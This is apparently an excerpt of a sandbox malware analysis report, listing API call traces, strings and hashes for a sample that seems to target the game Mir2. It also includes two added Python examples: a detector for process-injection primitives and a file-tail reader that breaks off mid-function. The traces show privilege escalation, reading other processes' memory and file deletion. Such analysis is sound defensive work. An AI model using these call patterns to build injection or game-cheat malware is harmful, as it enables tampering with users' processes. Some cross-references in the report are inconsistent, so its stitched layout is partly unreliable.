• API ID: Module32_strncmp$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
• String ID: Bass.acc$Bass.dll$LEGS_M_2$MIR2$M_I_R_2$TxGAME.exe$WdFileClient.dll$mirs
• API String ID: 2699731799-2446103735
• Opcode ID: 99ecc8f0ef09930d67f488820ceeb40a8494284f15f093a3f450818784753268
• Instruction ID: f4cec984906d133201c235e5d4907ac0741937cb3ca098b3745de168f62dce1c
• Opcode Fuzzy Hash: 99ecc8f0ef09930d67f488820ceeb40a8494284f15f093a3f450818784753268
• Instruction Fuzzy Hash: DAB10852D4C10577F71032A25D4AB6B25E94B723CCF0A0434ED19E71B3FF0AEA1991AB
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,6A6D6504), ref: 6A6D56D5
• GetFileSize.KERNEL32(00000000,00000000,00000000,?,6A6D6504), ref: 6A6D56EB
• CloseHandle.KERNEL32(00000000,?,6A6D6504), ref: 6A6D56FC
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: the same fourteen dumps (6A6D0000 through 6A77E000) listed in full above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: File$CloseCreateHandleSize
• String ID: LyDlq$WeDlq$wsdlq
• API String ID: 1378416451-3202960832
• Opcode ID: 6a41c100bd3e4abc804ed4ad2f5bc87f3b36a183cd1135187cd14e1cde596cce
• Instruction ID: 4aca76f72960004303f7ead8ca5aff29b6f3b1bf14b2ceffaf70a7b5db3447f9
• Opcode Fuzzy Hash: 6a41c100bd3e4abc804ed4ad2f5bc87f3b36a183cd1135187cd14e1cde596cce
• Instruction Fuzzy Hash: E8316D72608200ABE311253CAD8DBEB23DEDBC67B6F384635F452CB6D1EF509C0945A1
APIs
• _memset.LIBCMT ref: 6A6E1D90
• _memset.LIBCMT ref: 6A6E1DAA
• _memset.LIBCMT ref: 6A6E1DC4
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 6A6E1DD9
  • Part of subcall function 6A6DAF10: _memset.LIBCMT ref: 6A6DAF34
  • Part of subcall function 6A6DAF10: wsprintfA.USER32 ref: 6A6DAFBF
• wsprintfA.USER32 ref: 6A6E1E12
  • Part of subcall function 6A6E1A50: _memset.LIBCMT ref: 6A6E1A89
  • Part of subcall function 6A6E1A50: _strncpy.LIBCMT ref: 6A6E1AA6
• Sleep.KERNEL32(000003E8), ref: 6A6E1E7A
• DeleteFileA.KERNEL32(?), ref: 6A6E1E88
• GetLastError.KERNEL32 ref: 6A6E1E97
• _memset.LIBCMT ref: 6A6E1EBD
• _memset.LIBCMT ref: 6A6E1ED7
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: the same fourteen dumps (6A6D0000 through 6A77E000) listed in full above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: _memset$wsprintf$DeleteDirectoryErrorFileLastSleepWindows_strncpy
• String ID: %s\SysWOW64\%s.sys
• API String ID: 3126029581-2095779045
• Opcode ID: f48bc5a380a1356c1386f5da098fe37c9a3babf3fd4bdf2bfe41d822dc1f20dd
• Instruction ID: fa00612e3e1a3afa8bcb266c5be8da0300f2170f596b39bf2e2802426a708930
• Opcode Fuzzy Hash: f48bc5a380a1356c1386f5da098fe37c9a3babf3fd4bdf2bfe41d822dc1f20dd
• Instruction Fuzzy Hash: 574190B250D3819FD620DB64C995ADFB3E8AB95348F05482DF68983142EF749908CBB3
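Two of the function listings above are worth reading together: the one whose subcall 6A6DD8E0 chains RtlAdjustPrivilege, ZwOpenProcess with an all-access mask (001FFFFF), ZwAllocateVirtualMemory with MEM_COMMIT/PAGE_READWRITE (00001000, 00000004) and a later ReadProcessMemory, and the one that builds a %s\SysWOW64\%s.sys path with GetWindowsDirectoryA/wsprintfA, sleeps for 1000 ms (000003E8) and then calls DeleteFileA. The Python below is an example added by the editor, not Joe Sandbox code and not code from the sample: it parses "APIs" lines in exactly the shape this report prints them and flags those two patterns. The sample trace is copied from the listings above; the API name sets, the "look for the access mask in any argument slot" heuristic and the two-call window for Sleep/DeleteFileA are the editor's own assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# One "APIs" line of a function listing: an optional "Part of subcall function
# <addr>:" prefix, then Api.MODULE, an optional "(arg,arg,...)" window, then
# "ref: <call site>".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

PROCESS_ALL_ACCESS = 0x1FFFFF   # full-access mask on Vista and later
MEM_COMMIT = 0x1000
PAGE_READWRITE = 0x4
# API name sets are the editor's assumption about which calls matter here.
PRIV_APIS = {"RtlAdjustPrivilege", "AdjustTokenPrivileges"}
OPEN_APIS = {"ZwOpenProcess", "NtOpenProcess", "OpenProcess"}
ALLOC_APIS = {"ZwAllocateVirtualMemory", "NtAllocateVirtualMemory"}
RW_APIS = {"ReadProcessMemory", "WriteProcessMemory", "ZwReadVirtualMemory",
           "ZwWriteVirtualMemory", "NtReadVirtualMemory", "NtWriteVirtualMemory"}

# Sample input: API lines copied from the two function listings above.
SAMPLE_TRACE = """\
  • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
  • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
  • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
• ReadProcessMemory.KERNEL32 ref: 6A6D8DFC
• CloseHandle.KERNEL32(00000000), ref: 6A6D8E31
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 6A6E1DD9
• wsprintfA.USER32 ref: 6A6E1E12
• Sleep.KERNEL32(000003E8), ref: 6A6E1E7A
• DeleteFileA.KERNEL32(?), ref: 6A6E1E88
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]                    # raw tokens; "?" where the sandbox could not resolve a value
    ref: int                           # address of the call site
    subcall_of: Optional[int] = None   # callee address when the line is a "Part of subcall"


def _to_int(tok: str) -> Optional[int]:
    """Hex token -> int; None for '?' and non-numeric tokens such as inline strings."""
    try:
        return int(tok, 16)
    except ValueError:
        return None


def parse_trace(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                   # section headers such as "APIs" / "Strings"
        args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def find_injection_primitives(calls: List[ApiCall]) -> List[str]:
    """Flag privilege adjustment, full-access process open, RW allocation,
    cross-process read/write, and a Sleep followed closely by DeleteFileA."""
    findings = []
    for c in calls:
        if c.api in PRIV_APIS:
            findings.append(f"{c.api} at {c.ref:08X}")
        elif c.api in OPEN_APIS and any(_to_int(a) == PROCESS_ALL_ACCESS for a in c.args):
            # Heuristic (assumption): the report prints a window of stack words rather
            # than a decoded parameter list, so the mask is looked for in any slot.
            findings.append(f"{c.api} with PROCESS_ALL_ACCESS at {c.ref:08X}")
        elif c.api in ALLOC_APIS and len(c.args) >= 6:
            # NtAllocateVirtualMemory(Process, *Base, ZeroBits, *Size, AllocationType, Protect)
            if _to_int(c.args[4]) == MEM_COMMIT and _to_int(c.args[5]) == PAGE_READWRITE:
                findings.append(f"{c.api} MEM_COMMIT/PAGE_READWRITE at {c.ref:08X}")
        elif c.api in RW_APIS:
            findings.append(f"{c.api} at {c.ref:08X}")
    for i, c in enumerate(calls):
        if c.api == "Sleep" and c.args:
            for d in calls[i + 1:i + 3]:   # within the next two calls (assumed window)
                if d.api in ("DeleteFileA", "DeleteFileW"):
                    findings.append(f"Sleep({_to_int(c.args[0])} ms) then {d.api} at {d.ref:08X}")
                    break
    return findings


if __name__ == "__main__":
    for finding in find_injection_primitives(parse_trace(SAMPLE_TRACE)):
        print(finding)
```

Run it on any "APIs" section pasted from this report; unresolved "?" slots are skipped rather than guessed, which is why the access-mask rule scans every slot instead of trusting a fixed parameter position.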
APIs
• _memset.LIBCMT ref: 6A6DBB23
  • Part of subcall function 6A6DB9C0: WSAStartup.WS2_32 ref: 6A6DBA21
  • Part of subcall function 6A6DB9C0: gethostname.WS2_32(?,00000104), ref: 6A6DBA31
  • Part of subcall function 6A6DB9C0: __strlwr.LIBCMT ref: 6A6DBA3D
• _memset.LIBCMT ref: 6A6DBB46
Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$Startup__strlwrgethostname
                                                                                  • String ID: 1$B$a$e$k$n$s$t$u
                                                                                  • API String ID: 4043451516-1518658690
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • ReadProcessMemory.KERNEL32 ref: 6A6D8CA2
                                                                                  • ReadProcessMemory.KERNEL32(00000000,00C56381,?,00000015,00C52E41), ref: 6A6D8CDF
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D8D12
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Memory$Process$Virtual$AllocateInformationOpenQueryReadSystem$AdjustCloseFreeHandlePrivilege
                                                                                  • String ID: 7$8$:$c$h$k$m$o
                                                                                  • API String ID: 2751502915-258808670
                                                                                  APIs
                                                                                  • FormatMessageA.KERNEL32(00000900,00000000,?,00000800,?,00000000,00000000), ref: 6A6F2296
                                                                                  • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,?,00000000,00000000), ref: 6A6F22AE
                                                                                  • InternetGetLastResponseInfoA.WININET(00002EE3,00000000,00000000), ref: 6A6F22E4
                                                                                  • GetLastError.KERNEL32 ref: 6A6F22EA
                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 6A6F22FA
                                                                                  • InternetGetLastResponseInfoA.WININET(00002EE3,00000000,00000000), ref: 6A6F230F
                                                                                  • LocalFree.KERNEL32(00000000), ref: 6A6F2331
                                                                                    • Part of subcall function 6A6EE27D: __cftof.LIBCMT ref: 6A6EE28E
                                                                                  • LocalFree.KERNEL32(?), ref: 6A6F2356
                                                                                  • FreeLibrary.KERNEL32(?), ref: 6A6F235B
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: FreeLastLocal$FormatInfoInternetMessageResponse$AllocErrorLibrary__cftof
                                                                                  • String ID: WININET.DLL$.
                                                                                  • API String ID: 908267364-4264371604
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DBF00: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?,6A6E1A04,?,?,6A6D184E,?), ref: 6A6DBF26
                                                                                    • Part of subcall function 6A6DBF00: GetProcAddress.KERNEL32(00000000), ref: 6A6DBF2D
                                                                                  • _memset.LIBCMT ref: 6A6E1FD9
                                                                                  • _memset.LIBCMT ref: 6A6E1FED
                                                                                  • DeleteFileA.KERNEL32(?), ref: 6A6E200C
                                                                                    • Part of subcall function 6A6E1BA0: _memset.LIBCMT ref: 6A6E1BC8
                                                                                    • Part of subcall function 6A6E1BA0: _memset.LIBCMT ref: 6A6E1BE2
                                                                                    • Part of subcall function 6A6E1BA0: _memset.LIBCMT ref: 6A6E1BFC
                                                                                    • Part of subcall function 6A6E1BA0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 6A6E1C11
                                                                                    • Part of subcall function 6A6E1BA0: wsprintfA.USER32 ref: 6A6E1C68
                                                                                    • Part of subcall function 6A6E1BA0: DeleteFileA.KERNEL32(?), ref: 6A6E1D18
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _memset$DeleteFile$AddressDirectoryHandleModuleProcWindowswsprintf
                                                                                  • String ID: c6tmassa$l6tbasser.zip$o6saettr.zip$s6paies
                                                                                  • API String ID: 4161225031-2614848092
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                  • String ID: C:\pl.txt
                                                                                  • API String ID: 3727115324-85274317
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DFC70: _memset.LIBCMT ref: 6A6DFC97
                                                                                    • Part of subcall function 6A6DFC70: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 6A6DFCA2
                                                                                    • Part of subcall function 6A6DFC70: Process32First.KERNEL32 ref: 6A6DFCBC
                                                                                    • Part of subcall function 6A6DFC70: Process32Next.KERNEL32(00000000,00000002), ref: 6A6DFCD1
                                                                                    • Part of subcall function 6A6DFC70: CloseHandle.KERNEL32(00000000,00000000,00000002), ref: 6A6DFCDB
                                                                                  • _strncmp.LIBCMT ref: 6A6DDFE2
                                                                                  • _strncmp.LIBCMT ref: 6A6DE000
                                                                                  • _strncmp.LIBCMT ref: 6A6DE01A
                                                                                  • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6A6DE02B
                                                                                    • Part of subcall function 6A6DFC70: CloseHandle.KERNEL32(00000000), ref: 6A6DFD00
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DE045
                                                                                  • OutputDebugStringA.KERNEL32(6A71CCE4), ref: 6A6DE05F
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DE066
                                                                                    • Part of subcall function 6A6DDEC0: OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 6A6DDF1E
                                                                                    • Part of subcall function 6A6DDEC0: __wfopen_s.LIBCMT ref: 6A6DDF37
                                                                                    • Part of subcall function 6A6DDEC0: OutputDebugStringA.KERNEL32(OpenFileMapping failed,75920F00,?,?,?,?,?,?,?,?,?,?,6A6DDFD5,?,00000000,?), ref: 6A6DDF51
                                                                                    • Part of subcall function 6A6DDEC0: OutputDebugStringA.KERNEL32(6A71B18C,?,?,?,?,?,?,?,?,?,?,6A6DDFD5,?,00000000,?,?), ref: 6A6DDF58
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$_strncmp$CloseHandleProcess32__wfopen_s$CreateFileFirstMappingNextOpenSleepSnapshotToolhelp32_memset
                                                                                  • String ID: C:\pl.txt$|OK2|$|OK3|$|OK|
                                                                                  • API String ID: 1832730099-1708107098
APIs
  • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
  • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
  • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
  • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
  • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
  • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
  • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
  • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
• _memset.LIBCMT ref: 6A6D8A1F
• ReadProcessMemory.KERNEL32 ref: 6A6D8A7C
• CloseHandle.KERNEL32(00000000), ref: 6A6D8AA4
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: Memory$ProcessVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilegeRead_memset
• String ID: 4$5$M$a$c$m$o$x
• API String ID: 3693474235-2915274332
APIs
• FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 0BE97D20
• RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 0BE97D2C
• RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 0BE97D3B
• RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 0BE97D47
• SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0BE97D5F
• SendMessageA.USER32(00000000,?,00000000,00000000), ref: 0BE97D83
Strings
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
• Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID: ClipboardFormatRegister$MessageSend$FindWindow
• String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
• API String ID: 1416857345-3736581797
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,6A6D6522), ref: 6A6D5BB5
• GetFileSize.KERNEL32(00000000,00000000,?,6A6D6522), ref: 6A6D5BC5
• CloseHandle.KERNEL32(00000000,?,6A6D6522), ref: 6A6D5BD3
• _malloc.LIBCMT ref: 6A6D5BE4
• CloseHandle.KERNEL32(00000000,6A6D6522), ref: 6A6D5BF3
• _memset.LIBCMT ref: 6A6D5C07
• ReadFile.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,?,6A6D6522), ref: 6A6D5C1D
• CloseHandle.KERNEL32(00000000,?,?,?,6A6D6522), ref: 6A6D5C24
  • Part of subcall function 6A6FE26F: __lock.LIBCMT ref: 6A6FE28D
  • Part of subcall function 6A6FE26F: ___sbh_find_block.LIBCMT ref: 6A6FE298
  • Part of subcall function 6A6FE26F: ___sbh_free_block.LIBCMT ref: 6A6FE2A7
  • Part of subcall function 6A6FE26F: HeapFree.KERNEL32(00000000,?,6A726890,0000000C,6A705ECE,00000000,6A726C18,0000000C,6A705F08,?,?,?,6A70F988,00000004,6A726F98,0000000C), ref: 6A6FE2D7
  • Part of subcall function 6A6FE26F: GetLastError.KERNEL32(?,6A70F988,00000004,6A726F98,0000000C,6A706FD8,?,?,00000000,00000000,00000000,?,6A705835,00000001,00000214), ref: 6A6FE2E8
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: CloseFileHandle$CreateErrorFreeHeapLastReadSize___sbh_find_block___sbh_free_block__lock_malloc_memset
• String ID: PEC2^O$PEC2fO
• API String ID: 357344292-458899985
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,6A6D6484), ref: 6A6D5A35
• GetFileSize.KERNEL32(00000000,00000000,?,6A6D6484), ref: 6A6D5A45
• CloseHandle.KERNEL32(00000000,?,6A6D6484), ref: 6A6D5A53
• _malloc.LIBCMT ref: 6A6D5A64
• CloseHandle.KERNEL32(00000000,6A6D6484), ref: 6A6D5A73
• _memset.LIBCMT ref: 6A6D5A87
• ReadFile.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,?,6A6D6484), ref: 6A6D5A9D
• CloseHandle.KERNEL32(00000000,?,?,?,6A6D6484), ref: 6A6D5AA4
  • Part of subcall function 6A6FE26F: __lock.LIBCMT ref: 6A6FE28D
  • Part of subcall function 6A6FE26F: ___sbh_find_block.LIBCMT ref: 6A6FE298
  • Part of subcall function 6A6FE26F: ___sbh_free_block.LIBCMT ref: 6A6FE2A7
  • Part of subcall function 6A6FE26F: HeapFree.KERNEL32(00000000,?,6A726890,0000000C,6A705ECE,00000000,6A726C18,0000000C,6A705F08,?,?,?,6A70F988,00000004,6A726F98,0000000C), ref: 6A6FE2D7
  • Part of subcall function 6A6FE26F: GetLastError.KERNEL32(?,6A70F988,00000004,6A726F98,0000000C,6A706FD8,?,?,00000000,00000000,00000000,?,6A705835,00000001,00000214), ref: 6A6FE2E8
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: CloseFileHandle$CreateErrorFreeHeapLastReadSize___sbh_find_block___sbh_free_block__lock_malloc_memset
• String ID: PEC2^O$PEC2|O
• API String ID: 357344292-2876750026
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,6A6D7EFF,?,?,?,?), ref: 6A6D7DA6
• GetFileSize.KERNEL32(00000000,00000000,00000000,?,6A6D7EFF,?,?,?,?), ref: 6A6D7DBD
• CloseHandle.KERNEL32(00000000,?,6A6D7EFF,?,?,?,?), ref: 6A6D7DCE
Strings
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                  • String ID: Askm2com$www.Askm2.com
                                                                                  • API String ID: 1378416451-731777296
                                                                                  • Opcode ID: d763347d845c739acdb38ddfd8647eaded5093e7031624be816a4a36a96bb018
                                                                                  • Instruction ID: e0ff25e59121e34d00b45afb424ec00e63c0d17bedb18171a61aba25954967f4
                                                                                  • Opcode Fuzzy Hash: d763347d845c739acdb38ddfd8647eaded5093e7031624be816a4a36a96bb018
                                                                                  • Instruction Fuzzy Hash: 993189B26042042BE7006A78FC89BFB77DDDB873BAF140675F802C6191EF529C0946A2
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,6A6D64DD), ref: 6A6D5935
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,6A6D64DD), ref: 6A6D5945
                                                                                  • CloseHandle.KERNEL32(00000000,?,6A6D64DD), ref: 6A6D5953
                                                                                  • _malloc.LIBCMT ref: 6A6D5964
                                                                                  • CloseHandle.KERNEL32(00000000,6A6D64DD), ref: 6A6D5973
                                                                                  • _memset.LIBCMT ref: 6A6D5987
                                                                                  • SetFilePointer.KERNEL32(00000000,FFFFF830,00000000,00000002,?,?,?,6A6D64DD), ref: 6A6D5999
                                                                                  • ReadFile.KERNEL32(00000000,00000000,000007D0,?,00000000,?,?,?,6A6D64DD), ref: 6A6D59AD
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,6A6D64DD), ref: 6A6D59B4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseHandle$CreatePointerReadSize_malloc_memset
                                                                                  • String ID: http://www.m6dlq.com/
                                                                                  • API String ID: 1335355966-2465536842
                                                                                  • Opcode ID: 3496ae5ddf7ec99236a363c922ef07b32f94fc7b8c9c64d639014f9ce8e8e93e
                                                                                  • Instruction ID: 83912aa1dc293db878c4769b46c5b2c26238c7fdb744f4cb5314d60ea195d25e
                                                                                  • Opcode Fuzzy Hash: 3496ae5ddf7ec99236a363c922ef07b32f94fc7b8c9c64d639014f9ce8e8e93e
                                                                                  • Instruction Fuzzy Hash: E42168B26083507BF61026749C8FF8A33DEDB01776F284535F606ED4D1EFA4AC068699
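The call sequence in this record (CreateFileA with GENERIC_READ / FILE_SHARE_READ / OPEN_EXISTING, GetFileSize, SetFilePointer with a distance of 0xFFFFF830 from FILE_END, then ReadFile of 0x7D0 bytes) reads the final 0x7D0 = 2000 bytes of a file: 0xFFFFF830 is -0x7D0 once the DWORD is read as a signed 32-bit distance, which is how SetFilePointer treats lDistanceToMove. The Python below is an added example, not code from the sample or from the Joe Sandbox report. It reproduces that tail read on a constructed file so an analyst can inspect what sits in the last 2000 bytes of whatever file the sample opens. The file name, the filler bytes and the `CFG:` marker are constructed here; the page does not say what the sample does with the bytes it reads, and the URL string shown in the record is not used below.

```python
import os
import tempfile

TAIL_LEN = 0x7D0         # ReadFile length seen in the dump (2000 bytes)
TAIL_SEEK = 0xFFFFF830   # SetFilePointer lDistanceToMove as an unsigned DWORD


def signed32(value):
    """Interpret a 32-bit DWORD as a signed offset, as SetFilePointer does
    for lDistanceToMove. 0xFFFFF830 becomes -0x7D0."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value


def read_tail(path, length=TAIL_LEN):
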